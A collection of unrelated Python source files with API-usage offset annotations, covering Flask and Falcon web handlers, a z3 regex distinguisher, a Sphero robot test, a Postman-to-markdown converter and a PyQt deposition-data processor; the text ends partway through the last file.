    """Apply the posted form edits to one membership, then redirect to the list."""
    client = app.config.get("geekie_api_client")
    form = request.form
    # Roles/tags arrive as comma-separated text fields.
    payload = {
        "content_group_ids": [],
        "full_name": form["full_name"],
        "roles": form["roles"].split(", "),
        "tags": form["tags"].split(", "),
        "deleted": form.get("deleted", "false"),
        "external_id": form.get("external_id", ""),
    }
    client.update_membership(
        organization_id=organization_id,
        membership_id=membership_id,
        membership_data=payload,
    )
    return redirect(
        url_for("list_organization_memberships", organization_id=organization_id)
    )
# Error handlers.
@app.errorhandler(500)
def internal_error(error):
    """Serve the generic 500 page for unhandled server errors."""
    # db_session.rollback()  -- kept from the original template; no DB in use here
    body = render_template("errors/500.html")
    return body, 500
@app.errorhandler(404)
def not_found_error(error):
    """Serve the 404 page for unknown routes."""
    body = render_template("errors/404.html")
    return body, 404
if not app.debug:
    # Outside debug mode, mirror INFO-and-above log records to error.log.
    handler = FileHandler("error.log")
    fmt = Formatter("%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]")
    handler.setFormatter(fmt)
    handler.setLevel(logging.INFO)
    app.logger.setLevel(logging.INFO)
    app.logger.addHandler(handler)
    app.logger.info("errors")
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port:
if __name__ == "__main__":
    # Flask development server on the default port (not for production use).
    app.run()
# Or specify port manually:
"""
if __name__ == "__main__":
    port = int(os.environ.get("PORT", 5000))
    app.run(host="0.0.0.0", port=port)
"""
|
[
"logging.FileHandler",
"flask.Flask",
"logging.Formatter",
"flask.url_for",
"flask.render_template"
] |
[((590, 605), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (595, 605), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((968, 1002), 'flask.render_template', 'render_template', (['"""pages/home.html"""'], {}), "('pages/home.html')\n", (983, 1002), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((1427, 1512), 'flask.render_template', 'render_template', (['"""pages/show_organization.html"""'], {'organization_id': 'organization_id'}), "('pages/show_organization.html', organization_id=organization_id\n )\n", (1442, 1512), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((2121, 2247), 'flask.render_template', 'render_template', (['"""pages/members.html"""'], {'organization_id': 'organization_id', 'memberships': 'memberships', 'oauth_params': 'oauth_params'}), "('pages/members.html', organization_id=organization_id,\n memberships=memberships, oauth_params=oauth_params)\n", (2136, 2247), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((3086, 3216), 'flask.render_template', 'render_template', (['"""pages/edit_member.html"""'], {'organization_id': 'organization_id', 'membership_id': 'membership_id', 'membership': 'membership'}), "('pages/edit_member.html', organization_id=organization_id,\n membership_id=membership_id, membership=membership)\n", (3101, 3216), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4362, 4386), 'logging.FileHandler', 'FileHandler', (['"""error.log"""'], {}), "('error.log')\n", (4373, 4386), False, 'from logging import Formatter, FileHandler\n'), ((1257, 1325), 'flask.url_for', 'url_for', (['"""show_organization"""'], {'organization_id': 'remote_organization_id'}), "('show_organization', organization_id=remote_organization_id)\n", (1264, 1325), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((2713, 2786), 'flask.url_for', 
'url_for', (['"""list_organization_memberships"""'], {'organization_id': 'organization_id'}), "('list_organization_memberships', organization_id=organization_id)\n", (2720, 2786), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((3990, 4063), 'flask.url_for', 'url_for', (['"""list_organization_memberships"""'], {'organization_id': 'organization_id'}), "('list_organization_memberships', organization_id=organization_id)\n", (3997, 4063), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4180, 4214), 'flask.render_template', 'render_template', (['"""errors/500.html"""'], {}), "('errors/500.html')\n", (4195, 4214), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4284, 4318), 'flask.render_template', 'render_template', (['"""errors/404.html"""'], {}), "('errors/404.html')\n", (4299, 4318), False, 'from flask import Flask, redirect, render_template, request, url_for\n'), ((4426, 4511), 'logging.Formatter', 'Formatter', (['"""%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]"""'], {}), "('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'\n )\n", (4435, 4511), False, 'from logging import Formatter, FileHandler\n')]
|
import os
from falcon import falcon
from settings.settings import SETTINGS
from chameleon import PageTemplateLoader
class BasePage(object):
    """
    Generic base page object.

    Subclasses set ``template``/``templates_dir`` and override
    :meth:`get_data`.  Only GET is handled here; every other HTTP verb is
    answered with the default 404 template.
    """
    model = None
    property_types = []
    default_404 = SETTINGS['VIEWS']['DEFAULT_404_TEMPLATE']
    templates_dir = 'templates/'
    template = 'index.html'
    # NOTE(review): class-level mutable ``data`` is shared by every subclass
    # and instance; override it (or copy before mutating) in subclasses.
    data = {}
    allowed_methods = ['GET']
    group_access = SETTINGS['PERMISSIONS']['GROUPS']

    def load_templates(self, base_dir=None):
        """
        Load the template directory.

        Args:
            base_dir: directory to load from; defaults to ``templates_dir``.
        Returns:
            chameleon.PageTemplateLoader for the resolved directory.
        """
        base_dir_path = base_dir if base_dir else self.templates_dir
        return PageTemplateLoader(os.path.abspath(base_dir_path))

    def get_data(self, req):
        """
        Hook for subclasses to supply template data.

        Args:
            req: falcon request object.
        Returns:
            object passed to the template as ``data``.
        """
        return self.data

    def __forbidden_handler__(self, req, resp):
        """
        Default forbidden-case handler: render the default 404 page.

        As this is the BasePage super class, anything except GET should be
        forbidden; build a proper REST API with a resource class instead.
        """
        # NOTE(review): "/templates" is an absolute path, unlike the relative
        # ``templates_dir`` default above -- confirm this is intentional.
        templates = self.load_templates(base_dir="/templates")
        template = templates[self.default_404]
        resp.status = falcon.HTTP_404
        resp.content_type = "text/html"
        resp.body = template(data={'req': req})

    def on_get(self, req, resp):
        """
        Default HTTP GET handler: render ``self.template`` with the result
        of :meth:`get_data`.
        """
        data = self.get_data(req)
        templates = self.load_templates()
        try:
            template = templates[self.template]
        except (ValueError, KeyError):
            # Template lookup failed: answer 404 and stop.  The original
            # fell through and dereferenced the unbound ``template`` below,
            # raising NameError after the handler had already run.
            self.__forbidden_handler__(req, resp)
            return
        resp.status = falcon.HTTP_200
        resp.content_type = "text/html"
        resp.body = template(data=data)

    def on_post(self, req, resp):
        """Default POST handler: forbidden."""
        self.__forbidden_handler__(req, resp)

    def on_put(self, req, resp):
        """Default PUT handler: forbidden."""
        self.__forbidden_handler__(req, resp)

    def on_delete(self, req, resp):
        """Default DELETE handler: forbidden."""
        self.__forbidden_handler__(req, resp)

    def on_patch(self, req, resp):
        """Default PATCH handler: forbidden."""
        self.__forbidden_handler__(req, resp)
|
[
"os.path.abspath",
"chameleon.PageTemplateLoader"
] |
[((709, 739), 'os.path.abspath', 'os.path.abspath', (['base_dir_path'], {}), '(base_dir_path)\n', (724, 739), False, 'import os\n'), ((755, 783), 'chameleon.PageTemplateLoader', 'PageTemplateLoader', (['app_path'], {}), '(app_path)\n', (773, 783), False, 'from chameleon import PageTemplateLoader\n')]
|
import matplotlib.pyplot as plt
import random
if __name__ == '__main__':
    # Synthetic linear-trend time series with a burst of amplified noise in
    # the window [65, 75], which is also shaded red on the plot.
    random.seed(9)
    n_points = 100
    intercept, slope, noise_scale = 5, .2, 1
    trend = [intercept + slope * i for i in range(n_points)]
    noise = []
    for i in range(n_points):
        if 65 <= i <= 75:
            noise.append(7 * noise_scale * random.gauss(0, 1))
            plt.axvspan(i, i + 1, color='red', alpha=0.1)
        else:
            noise.append(noise_scale * random.gauss(0, 1))
    series = [t + e for t, e in zip(trend, noise)]
    plt.plot(series)
    plt.xticks([])
    plt.yticks([])
    plt.show()
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.axvspan",
"random.seed",
"random.gauss",
"matplotlib.pyplot.xticks"
] |
[((79, 93), 'random.seed', 'random.seed', (['(9)'], {}), '(9)\n', (90, 93), False, 'import random\n'), ((495, 507), 'matplotlib.pyplot.plot', 'plt.plot', (['ts'], {}), '(ts)\n', (503, 507), True, 'import matplotlib.pyplot as plt\n'), ((512, 526), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[]'], {}), '([])\n', (522, 526), True, 'import matplotlib.pyplot as plt\n'), ((531, 545), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[]'], {}), '([])\n', (541, 545), True, 'import matplotlib.pyplot as plt\n'), ((550, 560), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (558, 560), True, 'import matplotlib.pyplot as plt\n'), ((323, 368), 'matplotlib.pyplot.axvspan', 'plt.axvspan', (['i', '(i + 1)'], {'color': '"""red"""', 'alpha': '(0.1)'}), "(i, i + 1, color='red', alpha=0.1)\n", (334, 368), True, 'import matplotlib.pyplot as plt\n'), ((291, 309), 'random.gauss', 'random.gauss', (['(0)', '(1)'], {}), '(0, 1)\n', (303, 309), False, 'import random\n'), ((416, 434), 'random.gauss', 'random.gauss', (['(0)', '(1)'], {}), '(0, 1)\n', (428, 434), False, 'import random\n')]
|
import random
import re
import time
from itertools import combinations
import z3
from forest.logger import get_logger
from forest.utils import check_conditions
from forest.visitor import ToZ3, RegexInterpreter
logger = get_logger('forest')
# Toggle for z3's derivative-based string solver engine (best-effort below).
use_derivatives = True
# z3.set_param('smt.string_solver', 'z3str3')
class RegexDistinguisher:
    # Finds "distinguishing inputs": strings matched by some candidate regex
    # programs but not others, used to prune the candidate set interactively.
    def __init__(self):
        self._toz3 = ToZ3()
        self._printer = RegexInterpreter()
        self.force_multi_distinguish = False
        self.force_distinguish2 = False
    def distinguish(self, programs):
        """Dispatch to pairwise or multi-way distinguishing.

        Returns a 4-tuple (dist_input, keep_if_valid, keep_if_invalid,
        untouched_programs); all None when no distinguishing input exists.
        """
        logger.debug(f"Distinguishing {len(programs)}: "
                     f"{','.join(map(self._printer.eval, programs))}")
        assert len(programs) >= 2
        if not self.force_multi_distinguish and len(programs) == 2:
            return self.distinguish2(programs[0], programs[1])
        if self.force_distinguish2:
            # Pairwise-only mode: distinguish the first two, carry the rest.
            dist_input, keep_if_valid, keep_if_invalid, _ = \
                self.distinguish2(programs[0], programs[1])
            return dist_input, keep_if_valid, keep_if_invalid, programs[2:]
        else:
            return self.multi_distinguish(programs)
    def distinguish2(self, r1, r2):
        """Find a string accepted by exactly one of the two programs.

        r1/r2 appear to be tuples of (regex AST, _, (conditions, captures))
        -- confirm against the caller.
        """
        global use_derivatives
        solver = z3.Solver()
        # Fixed seeds keep solver output deterministic across runs.
        solver.set('random_seed', 7)
        solver.set('sat.random_seed', 7)
        if use_derivatives:
            # Best effort: older z3 builds do not know this option.
            try:
                solver.set('smt.seq.use_derivatives', True)
                solver.check()
            except:
                pass
        z3_r1 = self._toz3.eval(r1[0])
        z3_r2 = self._toz3.eval(r2[0])
        dist = z3.String("distinguishing")
        # ro_i <=> dist matches regex i; requiring ro_1 != ro_2 forces a
        # string in the symmetric difference of the two languages.
        ro_1 = z3.Bool(f"ro_1")
        solver.add(ro_1 == z3.InRe(dist, z3_r1))
        ro_2 = z3.Bool(f"ro_2")
        solver.add(ro_2 == z3.InRe(dist, z3_r2))
        solver.add(ro_1 != ro_2)
        if solver.check() == z3.sat:
            if len(r1[2][0]) == 0 and len(r2[2][0]) == 0:
                # No capture conditions on either side: any model works.
                dist_input = solver.model()[dist].as_string()
                if solver.model()[ro_1]:
                    return dist_input, [r1], [r2], []
                else:
                    return dist_input, [r2], [r1], []
            # Find dist_input that respects conditions
            r1_str = self._printer.eval(r1[0], captures=r1[2][1])
            r1_conditions = list(map(lambda c: " ".join(map(str, c)), r1[2][0]))
            r2_str = self._printer.eval(r2[0], captures=r2[2][1])
            r2_conditions = list(map(lambda c: " ".join(map(str, c)), r2[2][0]))
            # Enumerate models, excluding each rejected candidate, until one
            # satisfies either program's capture conditions.
            while True:
                dist_input = solver.model()[dist].as_string()
                match = re.fullmatch(r1_str, dist_input)
                if match is not None and check_conditions(r1_conditions, match):
                    break
                match = re.fullmatch(r2_str, dist_input)
                if match is not None and check_conditions(r2_conditions, match):
                    break
                solver.add(dist != z3.StringVal(dist_input))
                if not solver.check() == z3.sat:
                    return None, None, None, None
            if solver.model()[ro_1]:
                return dist_input, [r1], [r2], []
            else:
                return dist_input, [r2], [r1], []
        else:
            return None, None, None, None
    def multi_distinguish(self, regexes):
        """MaxSMT-based distinguishing over up to four programs at once."""
        start = time.time()
        # Problem: cannot distinguish more than 4 regexes at once: it takes forever.
        # Solution: use only 4 randomly selected regexes for the SMT maximization,
        # and then add the others to the solution.
        if len(regexes) <= 4:
            selected_regexes = regexes
            others = []
        else:
            # Fixed seed so the subset selection is reproducible.
            random.seed('regex')
            random.shuffle(regexes)
            selected_regexes = regexes[:4]
            others = regexes[4:]
        solver = z3.Optimize()
        z3_regexes = []
        for regex in selected_regexes:
            z3_regex = self._toz3.eval(regex)
            z3_regexes.append(z3_regex)
        dist = z3.String("distinguishing")
        # solver.add(z3.Length(dist) <= 6)
        ro_z3 = []
        for i, z3_regex in enumerate(z3_regexes):
            ro = z3.Bool(f"ro_{i}")
            ro_z3.append(ro)
            solver.add(ro == z3.InRe(dist, z3_regex))
        # ro_z3[i] == true if dist matches regex[i].
        # Soft-maximise the number of pairs the input tells apart.
        big_or = []
        for ro_i, ro_j in combinations(ro_z3, 2):
            big_or.append(z3.Xor(ro_i, ro_j))
            solver.add_soft(z3.Xor(ro_i, ro_j))
        solver.add(z3.Or(big_or)) # at least one regex is distinguished
        if solver.check() == z3.sat:
            # print(solver.model())
            print("took", round(time.time() - start, 2), "seconds")
            keep_if_valid = []
            keep_if_invalid = []
            dist_input = str(solver.model()[dist]).strip('"')
            for i, ro in enumerate(ro_z3):
                if solver.model()[ro]:
                    keep_if_valid.append(selected_regexes[i])
                else:
                    keep_if_invalid.append(selected_regexes[i])
            # NOTE(review): smallest_regex is computed but never used.
            smallest_regex = min(selected_regexes, key=lambda r: len(self._printer.eval(r)))
            return dist_input, keep_if_valid, keep_if_invalid, others
        else:
            return None, None, None, None
|
[
"re.fullmatch",
"z3.Xor",
"random.shuffle",
"z3.Optimize",
"forest.visitor.RegexInterpreter",
"z3.String",
"time.time",
"itertools.combinations",
"random.seed",
"z3.Solver",
"forest.visitor.ToZ3",
"z3.Or",
"z3.StringVal",
"z3.InRe",
"forest.logger.get_logger",
"z3.Bool",
"forest.utils.check_conditions"
] |
[((222, 242), 'forest.logger.get_logger', 'get_logger', (['"""forest"""'], {}), "('forest')\n", (232, 242), False, 'from forest.logger import get_logger\n'), ((386, 392), 'forest.visitor.ToZ3', 'ToZ3', ([], {}), '()\n', (390, 392), False, 'from forest.visitor import ToZ3, RegexInterpreter\n'), ((417, 435), 'forest.visitor.RegexInterpreter', 'RegexInterpreter', ([], {}), '()\n', (433, 435), False, 'from forest.visitor import ToZ3, RegexInterpreter\n'), ((1237, 1248), 'z3.Solver', 'z3.Solver', ([], {}), '()\n', (1246, 1248), False, 'import z3\n'), ((1599, 1626), 'z3.String', 'z3.String', (['"""distinguishing"""'], {}), "('distinguishing')\n", (1608, 1626), False, 'import z3\n'), ((1643, 1659), 'z3.Bool', 'z3.Bool', (['f"""ro_1"""'], {}), "(f'ro_1')\n", (1650, 1659), False, 'import z3\n'), ((1724, 1740), 'z3.Bool', 'z3.Bool', (['f"""ro_2"""'], {}), "(f'ro_2')\n", (1731, 1740), False, 'import z3\n'), ((3352, 3363), 'time.time', 'time.time', ([], {}), '()\n', (3361, 3363), False, 'import time\n'), ((3852, 3865), 'z3.Optimize', 'z3.Optimize', ([], {}), '()\n', (3863, 3865), False, 'import z3\n'), ((4032, 4059), 'z3.String', 'z3.String', (['"""distinguishing"""'], {}), "('distinguishing')\n", (4041, 4059), False, 'import z3\n'), ((4393, 4415), 'itertools.combinations', 'combinations', (['ro_z3', '(2)'], {}), '(ro_z3, 2)\n', (4405, 4415), False, 'from itertools import combinations\n'), ((3702, 3722), 'random.seed', 'random.seed', (['"""regex"""'], {}), "('regex')\n", (3713, 3722), False, 'import random\n'), ((3735, 3758), 'random.shuffle', 'random.shuffle', (['regexes'], {}), '(regexes)\n', (3749, 3758), False, 'import random\n'), ((4190, 4208), 'z3.Bool', 'z3.Bool', (['f"""ro_{i}"""'], {}), "(f'ro_{i}')\n", (4197, 4208), False, 'import z3\n'), ((4530, 4543), 'z3.Or', 'z3.Or', (['big_or'], {}), '(big_or)\n', (4535, 4543), False, 'import z3\n'), ((1687, 1707), 'z3.InRe', 'z3.InRe', (['dist', 'z3_r1'], {}), '(dist, z3_r1)\n', (1694, 1707), False, 'import z3\n'), ((1768, 
1788), 'z3.InRe', 'z3.InRe', (['dist', 'z3_r2'], {}), '(dist, z3_r2)\n', (1775, 1788), False, 'import z3\n'), ((2615, 2647), 're.fullmatch', 're.fullmatch', (['r1_str', 'dist_input'], {}), '(r1_str, dist_input)\n', (2627, 2647), False, 'import re\n'), ((2780, 2812), 're.fullmatch', 're.fullmatch', (['r2_str', 'dist_input'], {}), '(r2_str, dist_input)\n', (2792, 2812), False, 'import re\n'), ((4443, 4461), 'z3.Xor', 'z3.Xor', (['ro_i', 'ro_j'], {}), '(ro_i, ro_j)\n', (4449, 4461), False, 'import z3\n'), ((4491, 4509), 'z3.Xor', 'z3.Xor', (['ro_i', 'ro_j'], {}), '(ro_i, ro_j)\n', (4497, 4509), False, 'import z3\n'), ((2689, 2727), 'forest.utils.check_conditions', 'check_conditions', (['r1_conditions', 'match'], {}), '(r1_conditions, match)\n', (2705, 2727), False, 'from forest.utils import check_conditions\n'), ((2854, 2892), 'forest.utils.check_conditions', 'check_conditions', (['r2_conditions', 'match'], {}), '(r2_conditions, match)\n', (2870, 2892), False, 'from forest.utils import check_conditions\n'), ((4267, 4290), 'z3.InRe', 'z3.InRe', (['dist', 'z3_regex'], {}), '(dist, z3_regex)\n', (4274, 4290), False, 'import z3\n'), ((2956, 2980), 'z3.StringVal', 'z3.StringVal', (['dist_input'], {}), '(dist_input)\n', (2968, 2980), False, 'import z3\n'), ((4690, 4701), 'time.time', 'time.time', ([], {}), '()\n', (4699, 4701), False, 'import time\n')]
|
import uuid
from datetime import date
import os
import humanize
class Context:
    """Minimal stand-in for the AWS Lambda context object, for local testing.

    Mirrors the attributes Lambda provides: function name/version, a fake
    ARN, a request id, log group/stream names, and the memory limit.
    """

    def __init__(self, function_name, function_version):
        self.function_name = function_name
        self.function_version = function_version
        self.invoked_function_arn = "arn:aws:lambda:eu-north-1:000000000000:function:{}".format(self.function_name)
        self.aws_request_id = uuid.uuid1()
        self.log_group_name = "/aws/lambda/{}".format(self.function_name)
        today = date.today()
        self.log_stream_name = "{}/[{}]4459c970fa6d4c77aca62c95850fce54".format(today.strftime("%Y/%m/%d"), self.function_version)
        self.memory_limit_in_mb = self.memory()

    def memory(self):
        """Read this process's cgroup memory limit and return it as a
        human-readable string, also caching it on the instance.

        NOTE(review): assumes a cgroup-v1 layout; this path does not exist
        under cgroup v2 -- confirm the target environment.
        """
        # Read the pseudo-file directly instead of shelling out via
        # ``os.popen("cat ...")``: no subprocess, and a missing file raises
        # an exception instead of silently yielding an empty string.
        with open("/sys/fs/cgroup/memory/memory.limit_in_bytes") as limit_file:
            mem = int(limit_file.read())
        self.memory_limit_in_mb = humanize.naturalsize(mem, gnu=True)
        return self.memory_limit_in_mb
|
[
"uuid.uuid1",
"os.popen",
"datetime.date.today",
"humanize.naturalsize"
] |
[((376, 388), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (386, 388), False, 'import uuid\n'), ((479, 491), 'datetime.date.today', 'date.today', ([], {}), '()\n', (489, 491), False, 'from datetime import date\n'), ((834, 869), 'humanize.naturalsize', 'humanize.naturalsize', (['mem'], {'gnu': '(True)'}), '(mem, gnu=True)\n', (854, 869), False, 'import humanize\n'), ((732, 791), 'os.popen', 'os.popen', (['"""cat /sys/fs/cgroup/memory/memory.limit_in_bytes"""'], {}), "('cat /sys/fs/cgroup/memory/memory.limit_in_bytes')\n", (740, 791), False, 'import os\n')]
|
# python3
#import sys
#sys.path.append('/spherov2/')
import time
from spherov2 import scanner
from spherov2.sphero_edu import EventType, SpheroEduAPI
from spherov2.types import Color
print("Testing Starting...")
print("Connecting to Bolt...")
# Scan for a Sphero BOLT over Bluetooth; returns None when none is found.
toy = scanner.find_BOLT()
if toy is not None:
    print("Connected.")
    with SpheroEduAPI(toy) as droid:
        print("Testing Start...")
        droid.set_main_led(Color(r=0, g=255, b=0)) #Sets whole Matrix
        droid.reset_aim()
        droid.set_main_led(Color(r=0,g=0,b=255))
        # Read back the ambient-light and accelerometer sensors.
        print("Luminosity: " + str(droid.get_luminosity()))
        print("Accel: " + str(droid.get_acceleration()))
        # The triple-quoted block below is a disabled LED/matrix test
        # sequence kept for reference (evaluated as a no-op string).
        """
        print("Testing Main LED")
        droid.set_main_led(Color(r=0, g=0, b=255)) #Sets whole Matrix
        time.sleep(1)
        print("Testing Front LED")
        droid.set_front_led(Color(r=0, g=255, b=0)) #Sets front LED
        time.sleep(1)
        print("Testing Back LED")
        droid.set_back_led(Color(r=255, g=0, b=0)) #Sets back LED
        time.sleep(1)
        print("Set Matrix Pixel")
        droid.set_matrix_pixel(0, 0, Color(r=255, g=255, b=0)) #Set Matrix Pixel
        time.sleep(1)
        print("Set Matrix Line")
        droid.set_matrix_line(1, 0, 1, 7, Color(r=255, g=0, b=255)) #Set Matrix Line
        time.sleep(1)
        print("Set Matrix Fill")
        droid.set_matrix_fill(2, 0, 6, 6, Color(r=0, g=255, b=255)) #Set Matrix Box
        time.sleep(2)
        """
        droid.set_main_led(Color(r=255, g=0, b=0)) #Sets whole Matrix
        print("Testing End...")
        #droid.register_event(EventType.on_sensor_streaming_data, droid.SensorStreamingInfo) #how you would register to data (function name is custom)
|
[
"spherov2.sphero_edu.SpheroEduAPI",
"spherov2.scanner.find_BOLT",
"spherov2.types.Color"
] |
[((252, 271), 'spherov2.scanner.find_BOLT', 'scanner.find_BOLT', ([], {}), '()\n', (269, 271), False, 'from spherov2 import scanner\n'), ((326, 343), 'spherov2.sphero_edu.SpheroEduAPI', 'SpheroEduAPI', (['toy'], {}), '(toy)\n', (338, 343), False, 'from spherov2.sphero_edu import EventType, SpheroEduAPI\n'), ((415, 437), 'spherov2.types.Color', 'Color', ([], {'r': '(0)', 'g': '(255)', 'b': '(0)'}), '(r=0, g=255, b=0)\n', (420, 437), False, 'from spherov2.types import Color\n'), ((520, 542), 'spherov2.types.Color', 'Color', ([], {'r': '(0)', 'g': '(0)', 'b': '(255)'}), '(r=0, g=0, b=255)\n', (525, 542), False, 'from spherov2.types import Color\n'), ((1518, 1540), 'spherov2.types.Color', 'Color', ([], {'r': '(255)', 'g': '(0)', 'b': '(0)'}), '(r=255, g=0, b=0)\n', (1523, 1540), False, 'from spherov2.types import Color\n')]
|
import hashlib
import json
import sys
import time
from random import random
def custom_print(*args, sep=' ', end='\n', file=None):
    """Drop-in ``print`` replacement that prefixes the caller's line number
    and colors the message green with ANSI escapes.

    Args:
        args: objects to print; each is converted with ``str``.
        sep: separator placed between args (previously accepted but ignored;
            now honored -- default matches the old behavior).
        end: terminator appended after the message (previously ignored;
            now honored -- default matches the old behavior).
        file: writable text stream; defaults to ``sys.stdout``.
    """
    # Line number of the call site: one frame up from this function.
    line = sys._getframe().f_back.f_lineno
    stream = sys.stdout if file is None else file
    # REMIND: convert to str so numeric arguments can be joined.
    text = sep.join(str(arg) for arg in args)
    stream.write(f'{line}: \033[0;32m{text}\033[0m{end}')
def create_digest(username):
    """Return a salted, keyed blake2b hex digest of username + current time.

    The salt is random and the message embeds ``time.time()``, so each call
    produces a different digest for the same username.
    """
    key, person = b'xdf', b'xzz'
    timestamp = time.time()
    salt = str(random()).encode('utf-8')[:16]
    payload = (username + str(timestamp)).encode('utf-8')
    return hashlib.blake2b(payload, key=key, salt=salt, person=person).hexdigest()
    # print(digest.hexdigest())
# print(digest.hexdigest())
def postman_to_markdown(postmanfilename, postman_varname, postman_varname_global, markdowndocname=None):
    """Convert a Postman collection into a markdown API document, resolving
    ``{{variable}}`` placeholders from the two environment files.

    Args:
        postmanfilename: path to the Postman collection JSON export.
        postman_varname: environment JSON providing variable values.
        postman_varname_global: global environment JSON; its values override
            the plain environment on key collisions (as before).
        markdowndocname: output path.  Previously this parameter was accepted
            but unconditionally overwritten; it is now honored when given and
            derived from the collection name only when None.
    Returns:
        The path of the markdown file that was written.
    """
    with open(postmanfilename, 'r', encoding='UTF-8') as f:
        collection = json.load(f)
    if markdowndocname is None:
        markdowndocname = collection['info']['name'] + '接口文档.md'
    # Build the document in memory instead of writing it, re-reading it and
    # rewriting it; also drops the leftover custom_print debug calls.
    lines = ['# ' + collection['info']['name'] + '\n']
    for item in collection['item']:
        request = item['request']
        lines.append('## ' + request['method'] + ' ' + item['name'] + '\n')
        lines.append(request['url']['raw'] + '\n')
        formdata = request.get('body', {}).get('formdata')
        if formdata:
            lines.append('### ' + 'BODY formdata' + '\n')
            lines.append('参数名|参数值' + '\n')
            lines.append('---:|---:|' + '\n')
            for field in formdata:
                lines.append(field['key'] + '|' + field['value'] + '\n')
    content = ''.join(lines)
    with open(postman_varname, 'r', encoding='UTF-8') as f:
        environment = json.load(f)
    with open(postman_varname_global, 'r', encoding='UTF-8') as f:
        global_environment = json.load(f)
    variables = {value['key']: value['value'] for value in environment['values']}
    # Global values win on collisions, matching the original update() order.
    variables.update({value['key']: value['value'] for value in global_environment['values']})
    for key, value in variables.items():
        content = content.replace('{{' + key + '}}', value)
    with open(markdowndocname, 'w', encoding='UTF-8') as f:
        f.write(content)
    return markdowndocname
if __name__ == '__main__':
    # Convert the logreport collection using the outer-net and global envs.
    postman_to_markdown('logreport.postman_collection.json', 'logreport_outer_net.postman_environment.json', 'global.postman_environment.json')
|
[
"random.random",
"json.load",
"sys._getframe",
"time.time"
] |
[((621, 632), 'time.time', 'time.time', ([], {}), '()\n', (630, 632), False, 'import time\n'), ((1035, 1048), 'json.load', 'json.load', (['f1'], {}), '(f1)\n', (1044, 1048), False, 'import json\n'), ((1990, 2002), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1999, 2002), False, 'import json\n'), ((2090, 2103), 'json.load', 'json.load', (['f2'], {}), '(f2)\n', (2099, 2103), False, 'import json\n'), ((222, 237), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (235, 237), False, 'import sys\n'), ((648, 656), 'random.random', 'random', ([], {}), '()\n', (654, 656), False, 'from random import random\n')]
|
# <NAME> and <NAME>
# Created: 6/05/2013
# Last Updated: 6/14/2013
# For JCAP
import numpy as np
from PyQt4 import QtCore
from dictionary_helpers import *
import date_helpers
import filename_handler
import datareader
# global list holding all processed (z, x, y, rate) data for the experiment
DEP_DATA = []
# rounding precision for z values and tilt values, respectively
zndec = 1
tndec = 0
# sampling radii (units unspecified here -- presumably mm; confirm upstream)
radius1 = 28.
radius2 = 45.
""" does all of the data processing necessary for deposition plots """
class ProcessorThread(QtCore.QThread):
    # transfers new line from reader to MainMenu
    lineRead = QtCore.pyqtSignal(list)
    # transfers new processed data to deposition graph
    newData = QtCore.pyqtSignal(tuple)
    # reports the source number when its tilt-position column cannot be found
    srcError = QtCore.pyqtSignal(int)
    def __init__(self, parent=None, filename='default.csv'):
        super(ProcessorThread, self).__init__()
        self.file = filename
        self.rowBuffer = []
        self.changeZ = False
        self.running = True
        # the reader thread feeds raw spreadsheet rows to this processor
        # via its lineRead signal
        self.reader = datareader.DataReader(parent=self, filename=self.file)
        self.reader.lineRead.connect(self.newLineRead)
    def run(self):
        self.reader.start()
        # initialize DATA_DICT column numbers used for data processing
        try:
            self.tcolnum = getCol('Src%d Motor Tilt Position' %int(filename_handler.FILE_INFO['Source']))
        except IndexError:
            self.srcError.emit(int(filename_handler.FILE_INFO['Source']))
        self.zcolnum = getCol('Platen Zshift Motor 1 Position')
        self.anglecolnum = getCol('Platen Motor Position')
        # NOTE(review): busy-wait pins a CPU core; the thread only reacts to
        # queued signal callbacks while spinning here -- consider sleeping.
        while self.running:
            pass
    """ called whenever the reader sends a full line """
    def newLineRead(self, newRow):
        self.lineRead.emit(newRow)
        self.processRow(newRow)
    """ adds a new row to its own row buffer and processes the
    data in the row buffer if the azimuth or z-value of the
    instrument has changed """
    def processRow(self, row):
        if self.rowBuffer == []:
            self.rowBuffer += [row]
        else:
            angle = round(float(row[self.anglecolnum]))
            zval = round(float(row[self.zcolnum]), 2)
            prevangle = round(float(self.rowBuffer[-1][self.anglecolnum]), 0)
            prevz = round(float(self.rowBuffer[-1][self.zcolnum]), 2)
            if (angle == prevangle and zval == prevz):
                # still accumulating rows for the same (angle, z) segment
                self.rowBuffer += [row]
            elif (angle == prevangle):
                # z changed: finish processing the completed z at both radii
                self.processData(prevz, prevangle, radius1)
                self.processData(prevz, prevangle, radius2)
                # indicates that center point will need to be
                # computed in next round of processing
                self.changeZ = True
                # reset row buffer
                self.rowBuffer = [row]
            else:
                # angle changed: process the completed angle at both radii
                # NOTE(review): this branch passes the new row's zval rather
                # than prevz -- presumably equal when only the angle changed;
                # confirm.
                self.processData(zval, prevangle, radius1)
                self.processData(zval, prevangle, radius2)
                self.rowBuffer = [row]
    """ processes all rates at the same angle and z-value
    to produce a single (z, x, y, rate) data point """
    def processData(self, z, angle, radius):
        global DEP_DATA
        rowRange = self.getRowRange()
        # only one or two data points indicates a transitional angle
        # that can be ignored - Savitzky Golay can be used in the future
        if rowRange[1] - rowRange[0] <= 2:
            pass
        else:
            # get only valid rows from buffer
            dataArray = self.rowBuffer[rowRange[0]:(rowRange[1]+1)]
            # transpose matrix so that each column in the
            # spreadsheet becomes a row
